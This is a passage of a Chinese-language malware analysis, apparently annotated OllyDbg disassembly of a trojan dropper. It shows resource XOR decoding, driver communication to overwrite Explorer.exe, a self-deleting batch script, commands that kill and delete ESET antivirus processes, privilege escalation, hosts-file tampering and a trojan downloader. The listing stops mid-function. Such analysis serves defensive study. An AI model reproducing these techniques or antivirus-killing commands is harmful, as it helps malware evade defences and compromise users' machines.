00401DD0 |. 8D4C24 1C lea ecx, dword ptr [esp+1C]
00401DD4 |. 52 push edx ; /pProcessInfo
00401DD5 |. 51 push ecx ; |pStartupInfo
00401DD6 |. C74424 24 44000000 mov dword ptr [esp+24], 44 ; |
00401DDE |. 894424 50 mov dword ptr [esp+50], eax ; |
00401DE2 |. 66:C74424 54 0500 mov word ptr [esp+54], 5 ; |
00401DE9 |. 894424 60 mov dword ptr [esp+60], eax ; |
00401DED |. 894424 64 mov dword ptr [esp+64], eax ; |
00401DF1 |. 50 push eax ; |CurrentDir => NULL
00401DF2 |. 50 push eax ; |pEnvironment => NULL
00401DF3 |. 50 push eax ; |CreationFlags => 0
00401DF4 |. 6A 01 push 1 ; |InheritHandles = TRUE
00401DF6 |. 50 push eax ; |pThreadSecurity => NULL
00401DF7 |. 8D9424 7C010000 lea edx, dword ptr [esp+17C] ; |
00401DFE |. 50 push eax ; |pProcessSecurity => NULL
00401DFF |. 52 push edx ; |CommandLine
00401E00 |. 50 push eax ; |ModuleFileName => NULL
00401E01 |. FF15 60104000 call dword ptr [401060] ; \CreateProcessA
00401E07 |. 5F pop edi ; 命令行加载该dll CommandLine = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll testall"
00401E08 |. 5E pop esi
00401E09 |. 85C0 test eax, eax
00401E0B |. 5B pop ebx
00401E0C |. 74 18 je short 00401E26
00401E0E |. 8B4424 04 mov eax, dword ptr [esp+4]
00401E12 |. 50 push eax ; /hObject
00401E13 |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
00401E19 |. 8B4C24 00 mov ecx, dword ptr [esp]
00401E1D |. 6A FF push -1 ; /Timeout = INFINITE
00401E1F |. 51 push ecx ; |hObject
00401E20 |. FF15 5C104000 call dword ptr [40105C] ; \WaitForSingleObject
00401E26 |> 8D9424 54010000 lea edx, dword ptr [esp+154]
00401E2D |. 52 push edx ; //FileName = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll testall"
00401E2E |. FF15 A0104000 call dword ptr [4010A0] ; \DeleteFileA
00401E34 |. 81C4 54030000 add esp, 354
00401E3A \. C3 retn
关键call 3
00401650 /$ 81EC 30020000 sub esp, 230
00401656 |. 8A0D C0124000 mov cl, byte ptr [4012C0]
0040165C |. B0 5C mov al, 5C
0040165E |. 884424 00 mov byte ptr [esp], al
00401662 |. 884424 01 mov byte ptr [esp+1], al
00401666 |. 884424 03 mov byte ptr [esp+3], al
0040166A |. B0 70 mov al, 70
0040166C |. 884424 04 mov byte ptr [esp+4], al
00401670 |. 884424 0A mov byte ptr [esp+A], al
00401674 |. A1 BC124000 mov eax, dword ptr [4012BC]
00401679 |. 57 push edi
0040167A |. 894424 1C mov dword ptr [esp+1C], eax
0040167E |. 884C24 20 mov byte ptr [esp+20], cl
00401682 |. B9 3F000000 mov ecx, 3F
00401687 |. 33C0 xor eax, eax
00401689 |. 8D7C24 34 lea edi, dword ptr [esp+34]
0040168D |. 6A 00 push 0 ; /hTemplateFile = NULL
0040168F |. F3:AB rep stos dword ptr es:[edi] ; |
00401691 |. 66:AB stos word ptr es:[edi] ; |
00401693 |. AA stos byte ptr es:[edi] ; |
00401694 |. B9 3F000000 mov ecx, 3F ; |
00401699 |. 33C0 xor eax, eax ; |
0040169B |. 8DBC24 38010000 lea edi, dword ptr [esp+138] ; |
004016A2 |. 68 80000000 push 80 ; |Attributes = NORMAL
004016A7 |. F3:AB rep stos dword ptr es:[edi] ; |
004016A9 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
004016AB |. 6A 00 push 0 ; |pSecurity = NULL
004016AD |. 66:AB stos word ptr es:[edi] ; |
004016AF |. 6A 00 push 0 ; |ShareMode = 0
004016B1 |. 8D5424 18 lea edx, dword ptr [esp+18] ; |
004016B5 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004016BA |. 52 push edx ; |FileName
004016BB |. C64424 22 2E mov byte ptr [esp+22], 2E ; |
004016C0 |. C64424 25 63 mov byte ptr [esp+25], 63 ; |
004016C5 |. C64424 26 69 mov byte ptr [esp+26], 69 ; |
004016CA |. C64424 27 64 mov byte ptr [esp+27], 64 ; |
004016CF |. C64424 28 75 mov byte ptr [esp+28], 75 ; |
004016D4 |. C64424 29 6D mov byte ptr [esp+29], 6D ; |
004016D9 |. C64424 2B 00 mov byte ptr [esp+2B], 0 ; |
004016DE |. AA stos byte ptr es:[edi] ; |
004016DF |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
004016E5 |. 8BF8 mov edi, eax
004016E7 |. 85FF test edi, edi
004016E9 |. 0F84 2D010000 je 0040181C
004016EF |. A0 78124000 mov al, byte ptr [401278]
004016F4 |. 53 push ebx
004016F5 |. 55 push ebp
004016F6 |. 8BAC24 40020000 mov ebp, dword ptr [esp+240]
004016FD |. 56 push esi
004016FE |. 8B35 8C104000 mov esi, dword ptr [40108C] ; kernel32.lstrcpyA
00401704 |. 84C0 test al, al
00401706 |. 0F84 A8000000 je 004017B4
0040170C |. 8B0D B0124000 mov ecx, dword ptr [4012B0]
00401712 |. A1 AC124000 mov eax, dword ptr [4012AC]
00401717 |. 8B15 B4124000 mov edx, dword ptr [4012B4]
0040171D |. 894C24 34 mov dword ptr [esp+34], ecx
00401721 |. 894424 30 mov dword ptr [esp+30], eax
00401725 |. A1 B8124000 mov eax, dword ptr [4012B8]
0040172A |. 8D8C24 40010000 lea ecx, dword ptr [esp+140]
00401731 |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
00401736 |. 51 push ecx ; |Buffer
00401737 |. 895424 40 mov dword ptr [esp+40], edx ; |
0040173B |. 894424 44 mov dword ptr [esp+44], eax ; |
0040173F |. FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
00401745 |. 8D5424 28 lea edx, dword ptr [esp+28]
00401749 |. 8D4424 40 lea eax, dword ptr [esp+40]
0040174D |. 52 push edx ; /String2
0040174E |. 50 push eax ; |String1
0040174F |. FFD6 call esi ; \lstrcpyA
00401751 |. 8B1D 94104000 mov ebx, dword ptr [401094] ; kernel32.lstrcatA
00401757 |. 8D8C24 40010000 lea ecx, dword ptr [esp+140]
0040175E |. 8D5424 40 lea edx, dword ptr [esp+40]
00401762 |. 51 push ecx ; /StringToAdd
00401763 |. 52 push edx ; |ConcatString
00401764 |. FFD3 call ebx ; \lstrcatA
00401766 |. 8D4424 30 lea eax, dword ptr [esp+30]
0040176A |. 8D4C24 40 lea ecx, dword ptr [esp+40]
0040176E |. 50 push eax ; /StringToAdd
0040176F |. 51 push ecx ; |ConcatString
00401770 |. FFD3 call ebx ; \lstrcatA
00401772 |. 55 push ebp ; /String2
00401773 |. 68 E8104000 push 004010E8 ; |123321
00401778 |. FFD6 call esi ; \lstrcpyA
0040177A |. 8D5424 40 lea edx, dword ptr [esp+40]
0040177E |. 52 push edx ; /String2
0040177F |. 68 B0114000 push 004011B0 ; |String1 = 412489_f.004011B0
00401784 |. FFD6 call esi ; \lstrcpyA
00401786 |. 8D4424 1C lea eax, dword ptr [esp+1C]
0040178A |. 6A 00 push 0 ; /pOverlapped = NULL
0040178C |. 50 push eax ; |pBytesReturned
0040178D |. 6A 00 push 0 ; |OutBufferSize = 0
0040178F |. 6A 00 push 0 ; |OutBuffer = NULL
00401791 |. 8D4C24 30 lea ecx, dword ptr [esp+30] ; |
00401795 |. 6A 08 push 8 ; |InBufferSize = 8
00401797 |. 51 push ecx ; |InBuffer
00401798 |. 68 14202200 push 222014 ; |IoControlCode = 222014
0040179D |. 57 push edi ; |hDevice
0040179E |. C74424 40 E8104000 mov dword ptr [esp+40], 004010E8 ; |123321
004017A6 |. C74424 44 B0114000 mov dword ptr [esp+44], 004011B0 ; |C:\WINDOWS\system32\drivers\gm.dls
004017AE |. FF15 98104000 call dword ptr [401098] ; \DeviceIoControl
004017B4 |> 8B1D 9C104000 mov ebx, dword ptr [40109C] ; kernel32.Sleep
004017BA |. 68 B80B0000 push 0BB8 ; /Timeout = 3000. ms
004017BF |. FFD3 call ebx ; \Sleep
004017C1 |. 8B9424 48020000 mov edx, dword ptr [esp+248]
004017C8 |. 52 push edx
004017C9 |. 68 E8104000 push 004010E8 ; 123321
004017CE |. FFD6 call esi
004017D0 |. 55 push ebp
004017D1 |. 68 B0114000 push 004011B0 ; ASCII "\??\C:\WINDOWS\Explorer.EXE"
004017D6 |. FFD6 call esi
004017D8 |. 8D4424 1C lea eax, dword ptr [esp+1C]
004017DC |. 6A 00 push 0 ; /pOverlapped = NULL
004017DE |. 50 push eax ; |pBytesReturned
004017DF |. 6A 00 push 0 ; |OutBufferSize = 0
004017E1 |. 6A 00 push 0 ; |OutBuffer = NULL
004017E3 |. 8D4C24 30 lea ecx, dword ptr [esp+30] ; |
004017E7 |. 6A 08 push 8 ; |InBufferSize = 8
004017E9 |. 51 push ecx ; |InBuffer
004017EA |. 68 14202200 push 222014 ; |IoControlCode = 222014
004017EF |. 57 push edi ; |hDevice
004017F0 |. C74424 40 E8104000 mov dword ptr [esp+40], 004010E8 ; |123321
004017F8 |. C74424 44 B0114000 mov dword ptr [esp+44], 004011B0 ; | |ASCII "\??\C:\WINDOWS\Explorer.EXE"
00401800 |. FF15 98104000 call dword ptr [401098] ; \DeviceIoControl
00401806 |. 68 B80B0000 push 0BB8 ; 用DeviceIoControl与驱动程序进行通信,包括读和写两种操作
0040180B |. 33F6 xor esi, esi
0040180D |. FFD3 call ebx
0040180F |. 8BC6 mov eax, esi
00401811 |. 5E pop esi
00401812 |. 5D pop ebp
00401813 |. 5B pop ebx
00401814 |. 5F pop edi
00401815 |. 81C4 30020000 add esp, 230
0040181B |. C3 retn
0040181C |> 8B4424 10 mov eax, dword ptr [esp+10]
00401820 |. 5F pop edi
00401821 |. 81C4 30020000 add esp, 230
00401827 \. C3 retn
关键call 4
00401B70 /$ 81EC 14090000 sub esp, 914
00401B76 |. 56 push esi
00401B77 |. 57 push edi
00401B78 |. B9 40000000 mov ecx, 40
00401B7D |. 33C0 xor eax, eax
00401B7F |. 8D7C24 19 lea edi, dword ptr [esp+19]
00401B83 |. C64424 18 00 mov byte ptr [esp+18], 0
00401B88 |. F3:AB rep stos dword ptr es:[edi]
00401B8A |. 66:AB stos word ptr es:[edi]
00401B8C |. AA stos byte ptr es:[edi]
00401B8D |. B9 FF010000 mov ecx, 1FF
00401B92 |. 33C0 xor eax, eax
00401B94 |. 8DBC24 1D010000 lea edi, dword ptr [esp+11D]
00401B9B |. C68424 1C010000 00 mov byte ptr [esp+11C], 0
00401BA3 |. F3:AB rep stos dword ptr es:[edi]
00401BA5 |. 66:AB stos word ptr es:[edi]
00401BA7 |. 8B0D 30134000 mov ecx, dword ptr [401330]
00401BAD |. 66:8B15 34134000 mov dx, word ptr [401334]
00401BB4 |. AA stos byte ptr es:[edi]
00401BB5 |. A1 2C134000 mov eax, dword ptr [40132C]
00401BBA |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401BBF |. 894424 0C mov dword ptr [esp+C], eax ; |
00401BC3 |. 8D4424 1C lea eax, dword ptr [esp+1C] ; |
00401BC7 |. 50 push eax ; |PathBuffer
00401BC8 |. 6A 00 push 0 ; |hModule = NULL
00401BCA |. 894C24 18 mov dword ptr [esp+18], ecx ; |
00401BCE |. 66:895424 1C mov word ptr [esp+1C], dx ; |
00401BD3 |. FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00401BD9 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401BE0 |. 68 20134000 push 00401320 ; /@echo off\n\rkl78a.bat
00401BE5 |. 51 push ecx ; |String1
00401BE6 |. FF15 8C104000 call dword ptr [40108C] ; \lstrcpyA
00401BEC |. 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00401BF2 |. BF 0A000000 mov edi, 0A
00401BF7 |> 8D9424 1C010000 /lea edx, dword ptr [esp+11C]
00401BFE |. 68 08134000 |push 00401308 ; @echo kklfa>>11.ca\n\r
00401C03 |. 52 |push edx
00401C04 |. FFD6 |call esi
00401C06 |. 4F |dec edi
00401C07 |.^ 75 EE \jnz short 00401BF7
00401C09 |. 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401C10 |. 68 F8124000 push 004012F8 ; @del 11.ca\n\r
00401C15 |. 50 push eax
00401C16 |. FFD6 call esi
00401C18 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C1F |. 68 F0124000 push 004012F0 ; @del "
00401C24 |. 51 push ecx
00401C25 |. FFD6 call esi
00401C27 |. 8D5424 18 lea edx, dword ptr [esp+18]
00401C2B |. 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401C32 |. 52 push edx
00401C33 |. 50 push eax
00401C34 |. FFD6 call esi
00401C36 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C3D |. 68 EC124000 push 004012EC ; "\n\r@del "
00401C42 |. 51 push ecx
00401C43 |. FFD6 call esi
00401C45 |. 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401C4C |. 68 E4124000 push 004012E4 ; @del
00401C51 |. 52 push edx
00401C52 |. FFD6 call esi
00401C54 |. 8D4424 08 lea eax, dword ptr [esp+8]
00401C58 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C5F |. 50 push eax
00401C60 |. 51 push ecx
00401C61 |. FFD6 call esi
00401C63 |. 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401C6A |. 68 DC124000 push 004012DC ; \n\r@exit@del
00401C6F |. 52 push edx
00401C70 |. FFD6 call esi
00401C72 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401C74 |. 6A 00 push 0 ; |Attributes = 0
00401C76 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401C78 |. 6A 00 push 0 ; |pSecurity = NULL
00401C7A |. 6A 00 push 0 ; |ShareMode = 0
00401C7C |. 8D4424 1C lea eax, dword ptr [esp+1C] ; |
00401C80 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00401C85 |. 50 push eax ; |0012EB10 0012EB34 |FileName = "kl78a.bat"
00401C86 |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
00401C8C |. 8D4C24 14 lea ecx, dword ptr [esp+14]
00401C90 |. 6A 00 push 0 ; /pOverlapped = NULL
00401C92 |. 51 push ecx ; |pBytesWritten
00401C93 |. 8D9424 24010000 lea edx, dword ptr [esp+124] ; |
00401C9A |. 8BF0 mov esi, eax ; |
00401C9C |. 68 00080000 push 800 ; |nBytesToWrite = 800 (2048.)
00401CA1 |. 52 push edx ; |Buffer
00401CA2 |. 56 push esi ; |hFile
00401CA3 |. FF15 30104000 call dword ptr [401030] ; \WriteFile
00401CA9 |. 56 push esi ; /hObject
00401CAA |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
00401CB0 |. 6A 00 push 0
00401CB2 |. 6A 00 push 0
00401CB4 |. 8D4424 10 lea eax, dword ptr [esp+10]
00401CB8 |. 68 E4104000 push 004010E4
00401CBD |. 50 push eax
00401CBE |. 68 C8124000 push 004012C8 ; open
00401CC3 |. 6A 00 push 0
00401CC5 |. E8 76F7FFFF call <动态获得函数地址并运行文件>
00401CCA |. 83C4 18 add esp, 18
00401CCD |. 6A 00 push 0 ; /ExitCode = 0
00401CCF \. FF15 54104000 call dword ptr [401054] ; \ExitProcess
Bat内容:
0012EC48 40 65 63 68 6F 20 6F 66 66 0A 0D 40 65 63 68 6F @echo off..@echo
0012EC58 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012EC68 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012EC78 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E a..@echo kklfa>>
0012EC88 31 31 2E 63 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 11.ca..@echo kkl
0012EC98 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 65 63 68 6F fa>>11.ca..@echo
0012ECA8 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012ECB8 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012ECC8 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E a..@echo kklfa>>
0012ECD8 31 31 2E 63 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 11.ca..@echo kkl
0012ECE8 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 65 63 68 6F fa>>11.ca..@echo
0012ECF8 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012ED08 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012ED18 61 0A 0D 40 64 65 6C 20 31 31 2E 63 61 0A 0D 40 a..@del 11.ca..@
0012ED28 64 65 6C 20 22 43 3A 5C 74 72 6F 6A 61 6E 5C 74 del "C:\trojan\t
0012ED38 72 6F 6A 61 6E 5C 34 31 32 34 38 39 5F 66 6D 30 rojan\412489_fm0
0012ED48 31 2E 65 78 65 22 0A 0D 40 64 65 6C 20 6B 6C 37 1.exe"..@del kl7
0012ED58 38 61 2E 62 61 74 0A 0D 40 65 78 69 74 8a.bat..@exit
0012F3F0 63 6D 64 20 2F 63 20 73 63 20 64 65 6C 65 74 65 cmd /c sc delete
0012F400 20 65 6B 72 6E 00 00 00 63 6D 64 20 2F 63 20 74 ekrn...cmd /c t
0012F410 61 73 6B 6B 69 6C 6C 20 2F 69 6D 20 65 6B 72 6E askkill /im ekrn
0012F420 2E 65 78 65 20 2F 66 7C 63 6D 64 20 2F 63 20 74 .exe /f|cmd /c t
0012F430 61 73 6B 6B 69 6C 6C 20 2F 69 6D 20 65 67 75 69 askkill /im egui
0012F440 2E 65 78 65 20 2F 66 .exe /f
创建文件函数:这个函数被调用了三次,分别创建 44810500.dll、pcidump.sys、45757859.exe文件
00401830 <41>/$ 55 push ebp
00401831 |. 8BEC mov ebp, esp
00401833 |. 83EC 0C sub esp, 0C
00401836 |. 8B4D 08 mov ecx, [arg.1]
00401839 |. A1 C4124000 mov eax, dword ptr [4012C4]
0040183E |. 6A 00 push 0 ; /hTemplateFile = NULL
00401840 |. 6A 00 push 0 ; |Attributes = 0
00401842 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401844 |. 6A 00 push 0 ; |pSecurity = NULL
00401846 |. 6A 00 push 0 ; |ShareMode = 0
00401848 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040184D |. 51 push ecx ; |FileName
0040184E |. 8945 FC mov [local.1], eax ; |
00401851 |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
00401857 |. 85C0 test eax, eax ; 创建 44810500.dll文件
00401859 |. 8945 F4 mov [local.3], eax
0040185C |. 0F84 82000000 je 004018E4
00401862 |. 8B45 0C mov eax, [arg.2]
00401865 |. 53 push ebx
00401866 |. 56 push esi
00401867 |. 8D55 FC lea edx, [local.1]
0040186A |. 57 push edi ; 查找资源
0040186B |. 52 push edx ; /ResourceType
0040186C |. 50 push eax ; |ResourceName
0040186D |. 6A 00 push 0 ; |hModule = NULL
0040186F |. FF15 40104000 call dword ptr [401040] ; \FindResourceA
00401875 |. 8BF8 mov edi, eax
00401877 |. 57 push edi ; /hResource
00401878 |. 6A 00 push 0 ; |hModule = NULL
0040187A |. FF15 3C104000 call dword ptr [40103C] ; \LoadResource
00401880 |. 50 push eax ; /nHandles
00401881 |. 8945 0C mov [arg.2], eax ; |
00401884 |. 33F6 xor esi, esi ; |
00401886 |. FF15 38104000 call dword ptr [401038] ; \SetHandleCount
0040188C |. 8BD8 mov ebx, eax
0040188E |. C645 0B 00 mov byte ptr [ebp+B], 0
00401892 |. 90 nop
00401893 |. 57 push edi ; /hResource
00401894 |. 56 push esi ; |hModule => NULL
00401895 |. FF15 34104000 call dword ptr [401034] ; \SizeofResource
0040189B |. 85C0 test eax, eax
0040189D |. 74 2E je short 004018CD
0040189F |. 90 nop
004018A0 |> 8A0C33 /mov cl, byte ptr [ebx+esi]
004018A3 |. 8D55 F8 |lea edx, [local.2]
004018A6 |. 80F1 06 |xor cl, 6
004018A9 |. 6A 00 |push 0 ; /pOverlapped = NULL
004018AB |. 884D 0B |mov byte ptr [ebp+B], cl ; |
004018AE |. 8B4D F4 |mov ecx, [local.3] ; |
004018B1 |. 52 |push edx ; |pBytesWritten
004018B2 |. 8D45 0B |lea eax, dword ptr [ebp+B] ; |
004018B5 |. 6A 01 |push 1 ; |nBytesToWrite = 1
004018B7 |. 50 |push eax ; |Buffer
004018B8 |. 51 |push ecx ; |hFile
004018B9 |. FF15 30104000 |call dword ptr [401030] ; \WriteFile
004018BF |. 57 |push edi ; /hResource
004018C0 |. 6A 00 |push 0 ; |hModule = NULL
004018C2 |. 46 |inc esi ; |
004018C3 |. FF15 34104000 |call dword ptr [401034] ; \SizeofResource
004018C9 |. 3BF0 |cmp esi, eax
004018CB |.^ 72 D3 \jb short 004018A0
004018CD |> 8B55 0C mov edx, [arg.2]
004018D0 |. 52 push edx ; /hResource
004018D1 |. FF15 2C104000 call dword ptr [40102C] ; \FreeResource
004018D7 |. 8B45 F4 mov eax, [local.3]
004018DA |. 50 push eax ; /hObject
004018DB |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
004018E1 |. 5F pop edi
004018E2 |. 5E pop esi
004018E3 |. 5B pop ebx
004018E4 |> 8BE5 mov esp, ebp
004018E6 |. 5D pop ebp
004018E7 \. C2 0800 retn 8
动态获得函数地址并运行文件函数:每次的LoadLibraryA的dll不一样,shell32.ShellExecuteA,运行的文件也不一样
00401440 <41>/$ 56 push esi
00401441 |. 68 A0124000 push 004012A0 ; /shell32.dll\drivers\gm.dls\??\
00401446 |. FF15 A4104000 call dword ptr [4010A4] ; \LoadLibraryA
0040144C |. 8BF0 mov esi, eax
0040144E |. 68 90124000 push 00401290 ; /ShellExecuteA
00401453 |. 56 push esi ; |hModule
00401454 |. FF15 A8104000 call dword ptr [4010A8] ; \GetProcAddress
0040145A |. 85C0 test eax, eax
0040145C |. 74 27 je short 00401485
0040145E |. 8B4C24 1C mov ecx, dword ptr [esp+1C]
00401462 |. 8B5424 18 mov edx, dword ptr [esp+18]
00401466 |. 51 push ecx
00401467 |. 8B4C24 18 mov ecx, dword ptr [esp+18]
0040146B |. 52 push edx
0040146C |. 8B5424 18 mov edx, dword ptr [esp+18]
00401470 |. 51 push ecx
00401471 |. 8B4C24 18 mov ecx, dword ptr [esp+18]
00401475 |. 52 push edx
00401476 |. 8B5424 18 mov edx, dword ptr [esp+18]
0040147A |. 51 push ecx
0040147B |. 52 push edx
0040147C |. FFD0 call eax ; shell32.ShellExecuteA,运行C:\WINDOWS\temp\Explorer.exe
0040147E |. 56 push esi ; /hLibModule
0040147F |. FF15 B0104000 call dword ptr [4010B0] ; \FreeLibrary
00401485 |> 5E pop esi
00401486 \. C3 retn
44810500.dll文件分析,主要作用结束一些常见的杀毒软件进程
功能在testall函数中实现
100026B0 44810500.testall /$ 6A 00 push 0
100026B2 |. E8 49FFFFFF call 10002600 这个是关键call,有兴趣的同学可以自己分析文件
100026B7 |. 59 pop ecx
100026B8 \. C3 retn
100026B9 90 nop
100026BA 90 nop
100026BB 90 nop
100026BC 90 nop
100026BD 90 nop
100026BE 90 nop
100026BF 90 nop
100026C0 44810500.<ModuleE>/$ E8 9BFEFFFF call 10002560
100026C5 |. 8B4424 04 mov eax, dword ptr [esp+4]
100026C9 |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
100026CE |. 68 BC290010 push 100029BC ; |PathBuffer = 44810500.100029BC
100026D3 |. 50 push eax ; |hModule
100026D4 |. FF15 78100010 call dword ptr [<&KERNEL32.GetModuleFileName>; \GetModuleFileNameA
100026DA |. B8 01000000 mov eax, 1
100026DF \. C2 0C00 retn 0C
45757859.exe文件分析,此文件主要下载木马并运行
00400F39 457578>/$ 55 push ebp
00400F3A |. 8BEC mov ebp, esp
00400F3C |. 51 push ecx
00400F3D |. 51 push ecx
00400F3E |. 56 push esi
00400F3F |. 33F6 xor esi, esi ; 1.创建互斥体 "XETTETT......",如果存在则退出,避免病毒重复运行
00400F41 |. 68 D4074000 push 004007D4 ; /MutexName = "XETTETT......"
00400F46 |. 56 push esi ; |InitialOwner => FALSE
00400F47 |. 56 push esi ; |pSecurity => NULL
00400F48 |. FF15 50044000 call dword ptr [<&KERNEL32.CreateMutexA>] ; \CreateMutexA
00400F4E |. FF15 40044000 call dword ptr [<&KERNEL32.GetLastError>] ; [GetLastError
00400F54 |. 3D B7000000 cmp eax, 0B7
00400F59 |. 75 04 jnz short 00400F5F
00400F5B |. 33C0 xor eax, eax
00400F5D |. EB 60 jmp short 00400FBF
00400F5F |> 53 push ebx
00400F60 |. 57 push edi
00400F61 |. E8 45FCFFFF call 00400BAB ; call 1 给当前进程提权
00400F66 |. E8 EAFCFFFF call 00400C55 ; call 2 将wininet.dll复制到%TEMP%,获取网络函数地址
00400F6B |. E8 F8020000 call 00401268 ; call 3 写启动项
00400F70 |. 8B3D 4C044000 mov edi, dword ptr [<&KERNEL32.CreateThread>>; kernel32.CreateThread
00400F76 |. 56 push esi ; /pThreadId
00400F77 |. 56 push esi ; |CreationFlags
00400F78 |. 56 push esi ; |pThreadParm
00400F79 |. 68 F10E4000 push 00400EF1 ; |ThreadFunction = 线程1
00400F7E |. 56 push esi ; |StackSize
00400F7F |. 56 push esi ; |pSecurity
00400F80 |. FFD7 call edi ; \CreateThread
00400F82 |. 8D45 FC lea eax, [local.1]
线程1遍历窗口,如果发现"Windows 文件保护"窗口,隐藏WINDOWS文件保护窗口
00400F85 |. 50 push eax ; /pThreadId
00400F86 |. 56 push esi ; |CreationFlags
00400F87 |. 56 push esi ; |pThreadParm
00400F88 |. 68 7D114000 push 0040117D ; |ThreadFunction = 线程2 修改hosts
00400F8D |. 56 push esi ; |StackSize
00400F8E |. 56 push esi ; |pSecurity
00400F8F |. FFD7 call edi ; \CreateThread
00400F91 |. 8B1D 48044000 mov ebx, dword ptr [<&KERNEL32.WaitForSingle>; kernel32.WaitForSingleObject
00400F97 |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00400F9C |. 50 push eax ; |hObject
00400F9D |. FFD3 call ebx ; \WaitForSingleObject
00400F9F |. 8D45 F8 lea eax, [local.2]
00400FA2 |. 50 push eax ; /pThreadId
00400FA3 |. 56 push esi ; |CreationFlags
00400FA4 |. 56 push esi ; |pThreadParm
00400FA5 |. 68 FF0F4000 push 00400FFF ; |ThreadFunction = 线程3 采集信息
00400FAA |. 56 push esi ; |StackSize
00400FAB |. 56 push esi ; |pSecurity
00400FAC |. FFD7 call edi ; \CreateThread
00400FAE |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00400FB3 |. 50 push eax ; |hObject
00400FB4 |. FFD3 call ebx ; \WaitForSingleObject
00400FB6 |. E8 BC030000 call 00401377 ; call 4 下载木马
00400FBB |. 5F pop edi
00400FBC |. 33C0 xor eax, eax
00400FBE |. 5B pop ebx
00400FBF |> 5E pop esi
00400FC0 |. C9 leave
00400FC1 \. C3 retn
call 1
00400BAB /$ 55 push ebp
00400BAC |. 8BEC mov ebp, esp
00400BAE |. 83EC 14 sub esp, 14
00400BB1 |. FF15 7C044000 call dword ptr [<&KERNEL32.GetCurrentProcess>; [GetCurrentProcess
00400BB7 |. 8D4D FC lea ecx, [local.1]
00400BBA |. 51 push ecx ; /phToken
00400BBB |. 6A 28 push 28 ; |DesiredAccess = TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES
00400BBD |. 50 push eax ; |hProcess
00400BBE |. FF15 04044000 call dword ptr [<&ADVAPI32.OpenProcessToken>>; \OpenProcessToken
00400BC4 |. 85C0 test eax, eax
00400BC6 |. 74 33 je short 00400BFB
00400BC8 |. 8D45 F0 lea eax, [local.4]
00400BCB |. 56 push esi
00400BCC |. 50 push eax ; /pLocalId
00400BCD |. 33F6 xor esi, esi ; |
00400BCF |. 68 00074000 push 00400700 ; |Privilege = "SeDebugPrivilege"
00400BD4 |. 56 push esi ; |SystemName => NULL
00400BD5 |. FF15 00044000 call dword ptr [<&ADVAPI32.LookupPrivilegeVa>; \LookupPrivilegeValueA
00400BDB |. 56 push esi ; /pRetLen => NULL
00400BDC |. 56 push esi ; |pPrevState => NULL
00400BDD |. 8D45 EC lea eax, [local.5] ; |
00400BE0 |. 56 push esi ; |PrevStateSize => 0
00400BE1 |. 50 push eax ; |pNewState
00400BE2 |. 56 push esi ; |DisableAllPrivileges => FALSE
00400BE3 |. FF75 FC push [local.1] ; |hToken
00400BE6 |. C745 EC 0100000>mov [local.5], 1 ; |
00400BED |. C745 F8 0200000>mov [local.2], 2 ; |
00400BF4 |. FF15 14044000 call dword ptr [<&ADVAPI32.AdjustTokenPrivil>; \AdjustTokenPrivileges
00400BFA |. 5E pop esi
00400BFB |> C9 leave
00400BFC \. C3 retn
Call 2
00400C55 /$ 55 push ebp
00400C56 |. 8BEC mov ebp, esp
00400C58 |. 81EC 08020000 sub esp, 208
00400C5E |. 56 push esi
00400C5F |. 8D85 FCFEFFFF lea eax, [local.65]
00400C65 |. 57 push edi
00400C66 |. BE 04010000 mov esi, 104
00400C6B |. 50 push eax ; /Buffer
00400C6C |. 56 push esi ; |BufSize => 104 (260.)
00400C6D |. FF15 24044000 call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA
00400C73 |. 8D85 FCFEFFFF lea eax, [local.65]
00400C79 |. 50 push eax ; /TempName
00400C7A |. 6A 00 push 0 ; |Unique = 0
